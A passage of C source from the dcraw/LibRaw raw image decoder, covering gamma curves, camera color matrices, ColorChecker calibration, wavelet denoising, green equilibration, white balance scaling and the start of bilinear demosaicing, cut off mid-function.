static const uchar xlat[2][256] = {
{ 0xc1,0xbf,0x6d,0x0d,0x59,0xc5,0x13,0x9d,0x83,0x61,0x6b,0x4f,0xc7,0x7f,0x3d,0x3d,
0x53,0x59,0xe3,0xc7,0xe9,0x2f,0x95,0xa7,0x95,0x1f,0xdf,0x7f,0x2b,0x29,0xc7,0x0d,
0xdf,0x07,0xef,0x71,0x89,0x3d,0x13,0x3d,0x3b,0x13,0xfb,0x0d,0x89,0xc1,0x65,0x1f,
0xb3,0x0d,0x6b,0x29,0xe3,0xfb,0xef,0xa3,0x6b,0x47,0x7f,0x95,0x35,0xa7,0x47,0x4f,
0xc7,0xf1,0x59,0x95,0x35,0x11,0x29,0x61,0xf1,0x3d,0xb3,0x2b,0x0d,0x43,0x89,0xc1,
0x9d,0x9d,0x89,0x65,0xf1,0xe9,0xdf,0xbf,0x3d,0x7f,0x53,0x97,0xe5,0xe9,0x95,0x17,
0x1d,0x3d,0x8b,0xfb,0xc7,0xe3,0x67,0xa7,0x07,0xf1,0x71,0xa7,0x53,0xb5,0x29,0x89,
0xe5,0x2b,0xa7,0x17,0x29,0xe9,0x4f,0xc5,0x65,0x6d,0x6b,0xef,0x0d,0x89,0x49,0x2f,
0xb3,0x43,0x53,0x65,0x1d,0x49,0xa3,0x13,0x89,0x59,0xef,0x6b,0xef,0x65,0x1d,0x0b,
0x59,0x13,0xe3,0x4f,0x9d,0xb3,0x29,0x43,0x2b,0x07,0x1d,0x95,0x59,0x59,0x47,0xfb,
0xe5,0xe9,0x61,0x47,0x2f,0x35,0x7f,0x17,0x7f,0xef,0x7f,0x95,0x95,0x71,0xd3,0xa3,
0x0b,0x71,0xa3,0xad,0x0b,0x3b,0xb5,0xfb,0xa3,0xbf,0x4f,0x83,0x1d,0xad,0xe9,0x2f,
0x71,0x65,0xa3,0xe5,0x07,0x35,0x3d,0x0d,0xb5,0xe9,0xe5,0x47,0x3b,0x9d,0xef,0x35,
0xa3,0xbf,0xb3,0xdf,0x53,0xd3,0x97,0x53,0x49,0x71,0x07,0x35,0x61,0x71,0x2f,0x43,
0x2f,0x11,0xdf,0x17,0x97,0xfb,0x95,0x3b,0x7f,0x6b,0xd3,0x25,0xbf,0xad,0xc7,0xc5,
0xc5,0xb5,0x8b,0xef,0x2f,0xd3,0x07,0x6b,0x25,0x49,0x95,0x25,0x49,0x6d,0x71,0xc7 },
{ 0xa7,0xbc,0xc9,0xad,0x91,0xdf,0x85,0xe5,0xd4,0x78,0xd5,0x17,0x46,0x7c,0x29,0x4c,
0x4d,0x03,0xe9,0x25,0x68,0x11,0x86,0xb3,0xbd,0xf7,0x6f,0x61,0x22,0xa2,0x26,0x34,
0x2a,0xbe,0x1e,0x46,0x14,0x68,0x9d,0x44,0x18,0xc2,0x40,0xf4,0x7e,0x5f,0x1b,0xad,
0x0b,0x94,0xb6,0x67,0xb4,0x0b,0xe1,0xea,0x95,0x9c,0x66,0xdc,0xe7,0x5d,0x6c,0x05,
0xda,0xd5,0xdf,0x7a,0xef,0xf6,0xdb,0x1f,0x82,0x4c,0xc0,0x68,0x47,0xa1,0xbd,0xee,
0x39,0x50,0x56,0x4a,0xdd,0xdf,0xa5,0xf8,0xc6,0xda,0xca,0x90,0xca,0x01,0x42,0x9d,
0x8b,0x0c,0x73,0x43,0x75,0x05,0x94,0xde,0x24,0xb3,0x80,0x34,0xe5,0x2c,0xdc,0x9b,
0x3f,0xca,0x33,0x45,0xd0,0xdb,0x5f,0xf5,0x52,0xc3,0x21,0xda,0xe2,0x22,0x72,0x6b,
0x3e,0xd0,0x5b,0xa8,0x87,0x8c,0x06,0x5d,0x0f,0xdd,0x09,0x19,0x93,0xd0,0xb9,0xfc,
0x8b,0x0f,0x84,0x60,0x33,0x1c,0x9b,0x45,0xf1,0xf0,0xa3,0x94,0x3a,0x12,0x77,0x33,
0x4d,0x44,0x78,0x28,0x3c,0x9e,0xfd,0x65,0x57,0x16,0x94,0x6b,0xfb,0x59,0xd0,0xc8,
0x22,0x36,0xdb,0xd2,0x63,0x98,0x43,0xa1,0x04,0x87,0x86,0xf7,0xa6,0x26,0xbb,0xd6,
0x59,0x4d,0xbf,0x6a,0x2e,0xaa,0x2b,0xef,0xe6,0x78,0xb6,0x4e,0xe0,0x2f,0xdc,0x7c,
0xbe,0x57,0x19,0x32,0x7e,0x2a,0xd0,0xb8,0xba,0x29,0x00,0x3c,0x52,0x7d,0xa8,0x49,
0x3b,0x2d,0xeb,0x25,0x49,0xfa,0xa3,0xaa,0x39,0xa7,0xc5,0xa7,0x50,0x11,0x36,0xfb,
0xc6,0x67,0x4a,0xf5,0xa5,0x12,0x65,0x7e,0xb0,0xdf,0xaf,0x4e,0xb3,0x61,0x7f,0x2f } };
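/* gamma_curve() builds a 64K-entry tone curve from a power term (pwr) and a
   linear-toe slope (ts), sRGB/BT.709 style. Mode 0 only stores the solved
   parameters in gamm[]; otherwise curve[] is filled with the mapping or its
   inverse, depending on the remaining mode value. */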
void CLASS gamma_curve (double pwr, double ts, int mode, int imax)
{
int i;
double g[6], bnd[2]={0,0}, r;
g[0] = pwr;
g[1] = ts;
g[2] = g[3] = g[4] = 0;
bnd[g[1] >= 1] = 1;
if (g[1] && (g[1]-1)*(g[0]-1) <= 0) {
for (i=0; i < 48; i++) {
g[2] = (bnd[0] + bnd[1])/2;
if (g[0]) bnd[(pow(g[2]/g[1],-g[0]) - 1)/g[0] - 1/g[2] > -1] = g[2];
else bnd[g[2]/exp(1-1/g[2]) < g[1]] = g[2];
}
g[3] = g[2] / g[1];
if (g[0]) g[4] = g[2] * (1/g[0] - 1);
}
if (g[0]) g[5] = 1 / (g[1]*SQR(g[3])/2 - g[4]*(1 - g[3]) +
(1 - pow(g[3],1+g[0]))*(1 + g[4])/(1 + g[0])) - 1;
else g[5] = 1 / (g[1]*SQR(g[3])/2 + 1
- g[2] - g[3] - g[2]*g[3]*(log(g[3]) - 1)) - 1;
if (!mode--) {
memcpy (gamm, g, sizeof gamm);
return;
}
for (i=0; i < 0x10000; i++) {
curve[i] = 0xffff;
if ((r = (double) i / imax) < 1)
curve[i] = 0x10000 * ( mode
? (r < g[3] ? r*g[1] : (g[0] ? pow( r,g[0])*(1+g[4])-g[4] : log(r)*g[2]+1))
: (r < g[2] ? r/g[1] : (g[0] ? pow((r+g[4])/(1+g[4]),1/g[0]) : exp((r-1)/g[2]))));
}
}
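/* pseudoinverse(): inverts the 3x3 normal-equations matrix in^T * in by
   Gauss-Jordan elimination and multiplies by 'in' again, giving in effect the
   pseudoinverse of the size x 3 input (one output row per input row). */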
void CLASS pseudoinverse (double (*in)[3], double (*out)[3], int size)
{
double work[3][6], num;
int i, j, k;
for (i=0; i < 3; i++) {
for (j=0; j < 6; j++)
work[i][j] = j == i+3;
for (j=0; j < 3; j++)
for (k=0; k < size; k++)
work[i][j] += in[k][i] * in[k][j];
}
for (i=0; i < 3; i++) {
num = work[i][i];
for (j=0; j < 6; j++)
work[i][j] /= num;
for (k=0; k < 3; k++) {
if (k==i) continue;
num = work[k][i];
for (j=0; j < 6; j++)
work[k][j] -= work[i][j] * num;
}
}
for (i=0; i < size; i++)
for (j=0; j < 3; j++)
for (out[i][j]=k=0; k < 3; k++)
out[i][j] += work[j][k+3] * in[i][k];
}
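/* cam_xyz_coeff(): derive camera-to-RGB coefficients from a camera-to-XYZ
   matrix. cam_rgb = cam_xyz * xyz_rgb is normalized row by row so that white
   maps to white, pre_mul[] picks up the reciprocal row sums, and the
   pseudoinverse of cam_rgb yields _rgb_cam. */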
void CLASS cam_xyz_coeff (float _rgb_cam[3][4], double cam_xyz[4][3])
{
double cam_rgb[4][3], inverse[4][3], num;
int i, j, k;
for (i=0; i < colors; i++) /* Multiply out XYZ colorspace */
for (j=0; j < 3; j++)
for (cam_rgb[i][j] = k=0; k < 3; k++)
cam_rgb[i][j] += cam_xyz[i][k] * xyz_rgb[k][j];
for (i=0; i < colors; i++) { /* Normalize cam_rgb so that */
for (num=j=0; j < 3; j++) /* cam_rgb * (1,1,1) is (1,1,1,1) */
num += cam_rgb[i][j];
if(num > 0.00001)
{
for (j=0; j < 3; j++)
cam_rgb[i][j] /= num;
pre_mul[i] = 1 / num;
}
else
{
for (j=0; j < 3; j++)
cam_rgb[i][j] = 0.0;
pre_mul[i] = 1.0;
}
}
pseudoinverse (cam_rgb, inverse, colors);
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
_rgb_cam[i][j] = inverse[j][i];
}
#ifdef COLORCHECK
void CLASS colorcheck()
{
#define NSQ 24
// Coordinates of the GretagMacbeth ColorChecker squares
// width, height, 1st_column, 1st_row
int cut[NSQ][4]; // you must set these
// ColorChecker Chart under 6500-kelvin illumination
static const double gmb_xyY[NSQ][3] = {
{ 0.400, 0.350, 10.1 }, // Dark Skin
{ 0.377, 0.345, 35.8 }, // Light Skin
{ 0.247, 0.251, 19.3 }, // Blue Sky
{ 0.337, 0.422, 13.3 }, // Foliage
{ 0.265, 0.240, 24.3 }, // Blue Flower
{ 0.261, 0.343, 43.1 }, // Bluish Green
{ 0.506, 0.407, 30.1 }, // Orange
{ 0.211, 0.175, 12.0 }, // Purplish Blue
{ 0.453, 0.306, 19.8 }, // Moderate Red
{ 0.285, 0.202, 6.6 }, // Purple
{ 0.380, 0.489, 44.3 }, // Yellow Green
{ 0.473, 0.438, 43.1 }, // Orange Yellow
{ 0.187, 0.129, 6.1 }, // Blue
{ 0.305, 0.478, 23.4 }, // Green
{ 0.539, 0.313, 12.0 }, // Red
{ 0.448, 0.470, 59.1 }, // Yellow
{ 0.364, 0.233, 19.8 }, // Magenta
{ 0.196, 0.252, 19.8 }, // Cyan
{ 0.310, 0.316, 90.0 }, // White
{ 0.310, 0.316, 59.1 }, // Neutral 8
{ 0.310, 0.316, 36.2 }, // Neutral 6.5
{ 0.310, 0.316, 19.8 }, // Neutral 5
{ 0.310, 0.316, 9.0 }, // Neutral 3.5
{ 0.310, 0.316, 3.1 } }; // Black
double gmb_cam[NSQ][4], gmb_xyz[NSQ][3];
double inverse[NSQ][3], cam_xyz[4][3], balance[4], num;
int c, i, j, k, sq, row, col, pass, count[4];
memset (gmb_cam, 0, sizeof gmb_cam);
for (sq=0; sq < NSQ; sq++) {
FORCC count[c] = 0;
for (row=cut[sq][3]; row < cut[sq][3]+cut[sq][1]; row++)
for (col=cut[sq][2]; col < cut[sq][2]+cut[sq][0]; col++) {
c = FC(row,col);
if (c >= colors) c -= 2;
gmb_cam[sq][c] += BAYER2(row,col);
BAYER2(row,col) = black + (BAYER2(row,col)-black)/2;
count[c]++;
}
FORCC gmb_cam[sq][c] = gmb_cam[sq][c]/count[c] - black;
gmb_xyz[sq][0] = gmb_xyY[sq][2] * gmb_xyY[sq][0] / gmb_xyY[sq][1];
gmb_xyz[sq][1] = gmb_xyY[sq][2];
gmb_xyz[sq][2] = gmb_xyY[sq][2] *
(1 - gmb_xyY[sq][0] - gmb_xyY[sq][1]) / gmb_xyY[sq][1];
}
pseudoinverse (gmb_xyz, inverse, NSQ);
for (pass=0; pass < 2; pass++) {
for (raw_color = i=0; i < colors; i++)
for (j=0; j < 3; j++)
for (cam_xyz[i][j] = k=0; k < NSQ; k++)
cam_xyz[i][j] += gmb_cam[k][i] * inverse[k][j];
cam_xyz_coeff (rgb_cam, cam_xyz);
FORCC balance[c] = pre_mul[c] * gmb_cam[20][c];
for (sq=0; sq < NSQ; sq++)
FORCC gmb_cam[sq][c] *= balance[c];
}
if (verbose) {
printf (" { \"%s %s\", %d,\n\t{", make, model, black);
num = 10000 / (cam_xyz[1][0] + cam_xyz[1][1] + cam_xyz[1][2]);
FORCC for (j=0; j < 3; j++)
printf ("%c%d", (c | j) ? ',':' ', (int) (cam_xyz[c][j] * num + 0.5));
puts (" } },");
}
#undef NSQ
}
#endif
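/* hat_transform(): one-dimensional [1 2 1] hat filter with spacing sc and
   mirrored boundaries ("a trous" scheme); the 1/4 normalization is applied by
   the caller. This is the building block of wavelet_denoise(). */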
void CLASS hat_transform (float *temp, float *base, int st, int size, int sc)
{
int i;
for (i=0; i < sc; i++)
temp[i] = 2*base[st*i] + base[st*(sc-i)] + base[st*(i+sc)];
for (; i+sc < size; i++)
temp[i] = 2*base[st*i] + base[st*(i-sc)] + base[st*(i+sc)];
for (; i < size; i++)
temp[i] = 2*base[st*i] + base[st*(i-sc)] + base[st*(2*size-2-(i+sc))];
}
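/* wavelet_denoise(): five-level "a trous" wavelet decomposition of the data
   in the square-root domain, with soft thresholding of the detail planes
   (threshold scaled per level by the noise[] table). For three-color Bayer
   data the two green channels are afterwards pulled closer together. */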
#if !defined(LIBRAW_USE_OPENMP)
void CLASS wavelet_denoise()
{
float *fimg=0, *temp, thold, mul[2], avg, diff;
int scale=1, size, lev, hpass, lpass, row, col, nc, c, i, wlast, blk[2];
ushort *window[4];
static const float noise[] =
{ 0.8002,0.2735,0.1202,0.0585,0.0291,0.0152,0.0080,0.0044 };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Wavelet denoising...\n"));
#endif
while (maximum << scale < 0x10000) scale++;
maximum <<= --scale;
black <<= scale;
FORC4 cblack[c] <<= scale;
if ((size = iheight*iwidth) < 0x15550000)
fimg = (float *) malloc ((size*3 + iheight + iwidth) * sizeof *fimg);
merror (fimg, "wavelet_denoise()");
temp = fimg + size*3;
if ((nc = colors) == 3 && filters) nc++;
FORC(nc) { /* denoise R,G1,B,G3 individually */
for (i=0; i < size; i++)
fimg[i] = 256 * sqrt((double)(image[i][c] << scale));
for (hpass=lev=0; lev < 5; lev++) {
lpass = size*((lev & 1)+1);
for (row=0; row < iheight; row++) {
hat_transform (temp, fimg+hpass+row*iwidth, 1, iwidth, 1 << lev);
for (col=0; col < iwidth; col++)
fimg[lpass + row*iwidth + col] = temp[col] * 0.25;
}
for (col=0; col < iwidth; col++) {
hat_transform (temp, fimg+lpass+col, iwidth, iheight, 1 << lev);
for (row=0; row < iheight; row++)
fimg[lpass + row*iwidth + col] = temp[row] * 0.25;
}
thold = threshold * noise[lev];
for (i=0; i < size; i++) {
fimg[hpass+i] -= fimg[lpass+i];
if (fimg[hpass+i] < -thold) fimg[hpass+i] += thold;
else if (fimg[hpass+i] > thold) fimg[hpass+i] -= thold;
else fimg[hpass+i] = 0;
if (hpass) fimg[i] += fimg[hpass+i];
}
hpass = lpass;
}
for (i=0; i < size; i++)
image[i][c] = CLIP(SQR(fimg[i]+fimg[lpass+i])/0x10000);
}
if (filters && colors == 3) { /* pull G1 and G3 closer together */
for (row=0; row < 2; row++) {
mul[row] = 0.125 * pre_mul[FC(row+1,0) | 1] / pre_mul[FC(row,0) | 1];
blk[row] = cblack[FC(row,0) | 1];
}
for (i=0; i < 4; i++)
window[i] = (ushort *) fimg + width*i;
for (wlast=-1, row=1; row < height-1; row++) {
while (wlast < row+1) {
for (wlast++, i=0; i < 4; i++)
window[(i+3) & 3] = window[i];
for (col = FC(wlast,1) & 1; col < width; col+=2)
window[2][col] = BAYER(wlast,col);
}
thold = threshold/512;
for (col = (FC(row,0) & 1)+1; col < width-1; col+=2) {
avg = ( window[0][col-1] + window[0][col+1] +
window[2][col-1] + window[2][col+1] - blk[~row & 1]*4 )
* mul[row & 1] + (window[1][col] + blk[row & 1]) * 0.5;
avg = avg < 0 ? 0 : sqrt(avg);
diff = sqrt((double)BAYER(row,col)) - avg;
if (diff < -thold) diff += thold;
else if (diff > thold) diff -= thold;
else diff = 0;
BAYER(row,col) = CLIP(SQR(avg+diff) + 0.5);
}
}
}
free (fimg);
}
#else /* LIBRAW_USE_OPENMP */
void CLASS wavelet_denoise()
{
float *fimg=0, *temp, thold, mul[2], avg, diff;
int scale=1, size, lev, hpass, lpass, row, col, nc, c, i, wlast, blk[2];
ushort *window[4];
static const float noise[] =
{ 0.8002,0.2735,0.1202,0.0585,0.0291,0.0152,0.0080,0.0044 };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Wavelet denoising...\n"));
#endif
while (maximum << scale < 0x10000) scale++;
maximum <<= --scale;
black <<= scale;
FORC4 cblack[c] <<= scale;
if ((size = iheight*iwidth) < 0x15550000)
fimg = (float *) malloc ((size*3 + iheight + iwidth) * sizeof *fimg);
merror (fimg, "wavelet_denoise()");
temp = fimg + size*3;
if ((nc = colors) == 3 && filters) nc++;
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp parallel default(shared) private(i,col,row,thold,lev,lpass,hpass,temp,c) firstprivate(scale,size)
#endif
{
temp = (float*)malloc( (iheight + iwidth) * sizeof *fimg);
FORC(nc) { /* denoise R,G1,B,G3 individually */
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++)
fimg[i] = 256 * sqrt((double)(image[i][c] << scale));
for (hpass=lev=0; lev < 5; lev++) {
lpass = size*((lev & 1)+1);
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (row=0; row < iheight; row++) {
hat_transform (temp, fimg+hpass+row*iwidth, 1, iwidth, 1 << lev);
for (col=0; col < iwidth; col++)
fimg[lpass + row*iwidth + col] = temp[col] * 0.25;
}
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (col=0; col < iwidth; col++) {
hat_transform (temp, fimg+lpass+col, iwidth, iheight, 1 << lev);
for (row=0; row < iheight; row++)
fimg[lpass + row*iwidth + col] = temp[row] * 0.25;
}
thold = threshold * noise[lev];
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++) {
fimg[hpass+i] -= fimg[lpass+i];
if (fimg[hpass+i] < -thold) fimg[hpass+i] += thold;
else if (fimg[hpass+i] > thold) fimg[hpass+i] -= thold;
else fimg[hpass+i] = 0;
if (hpass) fimg[i] += fimg[hpass+i];
}
hpass = lpass;
}
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++)
image[i][c] = CLIP(SQR(fimg[i]+fimg[lpass+i])/0x10000);
}
free(temp);
} /* end omp parallel */
  /* The following loops are hard to parallelize: the wlast variable carries a
   * loop dependency. The second part should be easier, but is not done yet.
   */
if (filters && colors == 3) { /* pull G1 and G3 closer together */
for (row=0; row < 2; row++){
mul[row] = 0.125 * pre_mul[FC(row+1,0) | 1] / pre_mul[FC(row,0) | 1];
blk[row] = cblack[FC(row,0) | 1];
}
for (i=0; i < 4; i++)
window[i] = (ushort *) fimg + width*i;
for (wlast=-1, row=1; row < height-1; row++) {
while (wlast < row+1) {
for (wlast++, i=0; i < 4; i++)
window[(i+3) & 3] = window[i];
for (col = FC(wlast,1) & 1; col < width; col+=2)
window[2][col] = BAYER(wlast,col);
}
thold = threshold/512;
for (col = (FC(row,0) & 1)+1; col < width-1; col+=2) {
avg = ( window[0][col-1] + window[0][col+1] +
window[2][col-1] + window[2][col+1] - blk[~row & 1]*4 )
* mul[row & 1] + (window[1][col] + blk[row & 1]) * 0.5;
avg = avg < 0 ? 0 : sqrt(avg);
diff = sqrt((double)BAYER(row,col)) - avg;
if (diff < -thold) diff += thold;
else if (diff > thold) diff -= thold;
else diff = 0;
BAYER(row,col) = CLIP(SQR(avg+diff) + 0.5);
}
}
}
free (fimg);
}
#endif
// green equilibration
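/* In flat, unsaturated areas the second green channel (index 3) is rescaled
   by the ratio of the local means of the two green channels, which suppresses
   G1/G2 imbalance ("maze") artifacts before demosaicing. */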
void CLASS green_matching()
{
int i,j;
double m1,m2,c1,c2;
int o1_1,o1_2,o1_3,o1_4;
int o2_1,o2_2,o2_3,o2_4;
ushort (*img)[4];
const int margin = 3;
int oj = 2, oi = 2;
float f;
const float thr = 0.01f;
if(half_size || shrink) return;
if(FC(oj, oi) != 3) oj++;
if(FC(oj, oi) != 3) oi++;
if(FC(oj, oi) != 3) oj--;
img = (ushort (*)[4]) calloc (height*width, sizeof *image);
merror (img, "green_matching()");
memcpy(img,image,height*width*sizeof *image);
for(j=oj;j<height-margin;j+=2)
for(i=oi;i<width-margin;i+=2){
o1_1=img[(j-1)*width+i-1][1];
o1_2=img[(j-1)*width+i+1][1];
o1_3=img[(j+1)*width+i-1][1];
o1_4=img[(j+1)*width+i+1][1];
o2_1=img[(j-2)*width+i][3];
o2_2=img[(j+2)*width+i][3];
o2_3=img[j*width+i-2][3];
o2_4=img[j*width+i+2][3];
m1=(o1_1+o1_2+o1_3+o1_4)/4.0;
m2=(o2_1+o2_2+o2_3+o2_4)/4.0;
c1=(abs(o1_1-o1_2)+abs(o1_1-o1_3)+abs(o1_1-o1_4)+abs(o1_2-o1_3)+abs(o1_3-o1_4)+abs(o1_2-o1_4))/6.0;
c2=(abs(o2_1-o2_2)+abs(o2_1-o2_3)+abs(o2_1-o2_4)+abs(o2_2-o2_3)+abs(o2_3-o2_4)+abs(o2_2-o2_4))/6.0;
if((img[j*width+i][3]<maximum*0.95)&&(c1<maximum*thr)&&(c2<maximum*thr))
{
f = image[j*width+i][3]*m1/m2;
image[j*width+i][3]=f>0xffff?0xffff:f;
}
}
free(img);
}
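/* scale_colors(): derive white-balance multipliers (auto WB averaged over the
   greybox, camera WB from metadata, or user_mul), subtract per-channel black,
   scale everything toward the 0..65535 range, and optionally correct lateral
   chromatic aberration by rescaling the red and blue planes. */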
void CLASS scale_colors()
{
unsigned bottom, right, size, row, col, ur, uc, i, x, y, c, sum[8];
int val, dark, sat;
double dsum[8], dmin, dmax;
float scale_mul[4], fr, fc;
ushort *img=0, *pix;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_SCALE_COLORS,0,2);
#endif
if (user_mul[0])
memcpy (pre_mul, user_mul, sizeof pre_mul);
if (use_auto_wb || (use_camera_wb && cam_mul[0] == -1)) {
memset (dsum, 0, sizeof dsum);
bottom = MIN (greybox[1]+greybox[3], height);
right = MIN (greybox[0]+greybox[2], width);
for (row=greybox[1]; row < bottom; row += 8)
for (col=greybox[0]; col < right; col += 8) {
memset (sum, 0, sizeof sum);
for (y=row; y < row+8 && y < bottom; y++)
for (x=col; x < col+8 && x < right; x++)
FORC4 {
if (filters) {
c = fcol(y,x);
val = BAYER2(y,x);
} else
val = image[y*width+x][c];
if (val > maximum-25) goto skip_block;
if ((val -= cblack[c]) < 0) val = 0;
sum[c] += val;
sum[c+4]++;
if (filters) break;
}
FORC(8) dsum[c] += sum[c];
skip_block: ;
}
FORC4 if (dsum[c]) pre_mul[c] = dsum[c+4] / dsum[c];
}
if (use_camera_wb && cam_mul[0] != -1) {
memset (sum, 0, sizeof sum);
for (row=0; row < 8; row++)
for (col=0; col < 8; col++) {
c = FC(row,col);
if ((val = white[row][col] - cblack[c]) > 0)
sum[c] += val;
sum[c+4]++;
}
#ifdef LIBRAW_LIBRARY_BUILD
if(load_raw == &LibRaw::nikon_load_sraw)
{
// Nikon sRAW: camera WB already applied:
pre_mul[0]=pre_mul[1]=pre_mul[2]=pre_mul[3]=1.0;
}
else
#endif
if (sum[0] && sum[1] && sum[2] && sum[3])
FORC4 pre_mul[c] = (float) sum[c+4] / sum[c];
else if (cam_mul[0] && cam_mul[2])
memcpy (pre_mul, cam_mul, sizeof pre_mul);
else
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_CAMERA_WB;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Cannot use camera white balance.\n"), ifname);
#endif
}
}
#ifdef LIBRAW_LIBRARY_BUILD
// Nikon sRAW, daylight
if (load_raw == &LibRaw::nikon_load_sraw
&& !use_camera_wb && !use_auto_wb
&& cam_mul[0] > 0.001f && cam_mul[1] > 0.001f && cam_mul[2] > 0.001f )
{
for(c=0;c<3;c++)
pre_mul[c]/=cam_mul[c];
}
#endif
if (pre_mul[1] == 0) pre_mul[1] = 1;
if (pre_mul[3] == 0) pre_mul[3] = colors < 4 ? pre_mul[1] : 1;
dark = black;
sat = maximum;
if (threshold) wavelet_denoise();
maximum -= black;
for (dmin=DBL_MAX, dmax=c=0; c < 4; c++) {
if (dmin > pre_mul[c])
dmin = pre_mul[c];
if (dmax < pre_mul[c])
dmax = pre_mul[c];
}
if (!highlight) dmax = dmin;
FORC4 scale_mul[c] = (pre_mul[c] /= dmax) * 65535.0 / maximum;
#ifdef DCRAW_VERBOSE
if (verbose) {
fprintf (stderr,
_("Scaling with darkness %d, saturation %d, and\nmultipliers"), dark, sat);
FORC4 fprintf (stderr, " %f", pre_mul[c]);
fputc ('\n', stderr);
}
#endif
if (filters > 1000 && (cblack[4]+1)/2 == 1 && (cblack[5]+1)/2 == 1) {
FORC4 cblack[FC(c/2,c%2)] +=
cblack[6 + c/2 % cblack[4] * cblack[5] + c%2 % cblack[5]];
cblack[4] = cblack[5] = 0;
}
size = iheight*iwidth;
#ifdef LIBRAW_LIBRARY_BUILD
scale_colors_loop(scale_mul);
#else
for (i=0; i < size*4; i++) {
if (!(val = ((ushort *)image)[i])) continue;
if (cblack[4] && cblack[5])
val -= cblack[6 + i/4 / iwidth % cblack[4] * cblack[5] +
i/4 % iwidth % cblack[5]];
val -= cblack[i & 3];
val *= scale_mul[i & 3];
((ushort *)image)[i] = CLIP(val);
}
#endif
if ((aber[0] != 1 || aber[2] != 1) && colors == 3) {
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Correcting chromatic aberration...\n"));
#endif
for (c=0; c < 4; c+=2) {
if (aber[c] == 1) continue;
img = (ushort *) malloc (size * sizeof *img);
merror (img, "scale_colors()");
for (i=0; i < size; i++)
img[i] = image[i][c];
for (row=0; row < iheight; row++) {
ur = fr = (row - iheight*0.5) * aber[c] + iheight*0.5;
if (ur > iheight-2) continue;
fr -= ur;
for (col=0; col < iwidth; col++) {
uc = fc = (col - iwidth*0.5) * aber[c] + iwidth*0.5;
if (uc > iwidth-2) continue;
fc -= uc;
pix = img + ur*iwidth + uc;
image[row*iwidth+col][c] =
(pix[ 0]*(1-fc) + pix[ 1]*fc) * (1-fr) +
(pix[iwidth]*(1-fc) + pix[iwidth+1]*fc) * fr;
}
}
free(img);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_SCALE_COLORS,1,2);
#endif
}
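/* pre_interpolate(), roughly: when the image was decoded at reduced size but
   full output is wanted, scatter the values back into a full-size mosaic; for
   half-size output, patch the X-Trans case; then either keep both greens
   (four-color mode) or fold G3 into G1 and simplify the filter pattern. */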
void CLASS pre_interpolate()
{
ushort (*img)[4];
int row, col, c;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_PRE_INTERPOLATE,0,2);
#endif
if (shrink) {
if (half_size) {
height = iheight;
width = iwidth;
if (filters == 9) {
for (row=0; row < 3; row++)
for (col=1; col < 4; col++)
if (!(image[row*width+col][0] | image[row*width+col][2]))
goto break2; break2:
for ( ; row < height; row+=3)
for (col=(col-1)%3+1; col < width-1; col+=3) {
img = image + row*width+col;
for (c=0; c < 3; c+=2)
img[0][c] = (img[-1][c] + img[1][c]) >> 1;
}
}
} else {
img = (ushort (*)[4]) calloc (height, width*sizeof *img);
merror (img, "pre_interpolate()");
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
c = fcol(row,col);
img[row*width+col][c] = image[(row >> 1)*iwidth+(col >> 1)][c];
}
free (image);
image = img;
shrink = 0;
}
}
if (filters > 1000 && colors == 3) {
mix_green = four_color_rgb ^ half_size;
if (four_color_rgb | half_size) colors++;
else {
for (row = FC(1,0) >> 1; row < height; row+=2)
for (col = FC(row,1) & 1; col < width; col+=2)
image[row*width+col][1] = image[row*width+col][3];
filters &= ~((filters & 0x55555555) << 1);
}
}
if (half_size) filters = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_PRE_INTERPOLATE,1,2);
#endif
}
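/* border_interpolate(): fill the missing colors of the outer 'border' ring of
   pixels with simple 3x3 averages of whatever same-color neighbors exist. */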
void CLASS border_interpolate (int border)
{
unsigned row, col, y, x, f, c, sum[8];
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
if (col==border && row >= border && row < height-border)
col = width-border;
memset (sum, 0, sizeof sum);
for (y=row-1; y != row+2; y++)
for (x=col-1; x != col+2; x++)
if (y < height && x < width) {
f = fcol(y,x);
sum[f] += image[y*width+x][f];
sum[f+4]++;
}
f = fcol(row,col);
FORCC if (c != f && sum[c+4])
image[row*width+col][c] = sum[c] / sum[c+4];
}
}
void CLASS lin_interpolate_loop(int code[16][16][32],int size)
{
int row;
for (row=1; row < height-1; row++)
{
int col,*ip;
ushort *pix;
for (col=1; col < width-1; col++) {
int i;
int sum[4];
pix = image[row*width+col];
ip = code[row % size][col % size];
memset (sum, 0, sizeof sum);
for (i=*ip++; i--; ip+=3)
sum[ip[2]] += pix[ip[0]] << ip[1];
for (i=colors; --i; ip+=2)
pix[ip[0]] = sum[ip[0]] * ip[1] >> 8;
}
}
}
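/* lin_interpolate(): bilinear demosaic. For each position in the CFA repeat
   pattern a small weight table is precomputed (code[][]); lin_interpolate_loop()
   then applies it to every interior pixel, and the borders are handled
   separately by border_interpolate(1). */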
void CLASS lin_interpolate()
{
int code[16][16][32], size=16, *ip, sum[4];
int f, c, x, y, row, col, shift, color;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Bilinear interpolation...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,0,3);
#endif
if (filters == 9) size = 6;
border_interpolate(1);
for (row=0; row < size; row++)
for (col=0; col < size; col++) {
ip = code[row][col]+1;
f = fcol(row,col);
memset (sum, 0, sizeof sum);
for (y=-1; y <= 1; y++)
for (x=-1; x <= 1; x++) {
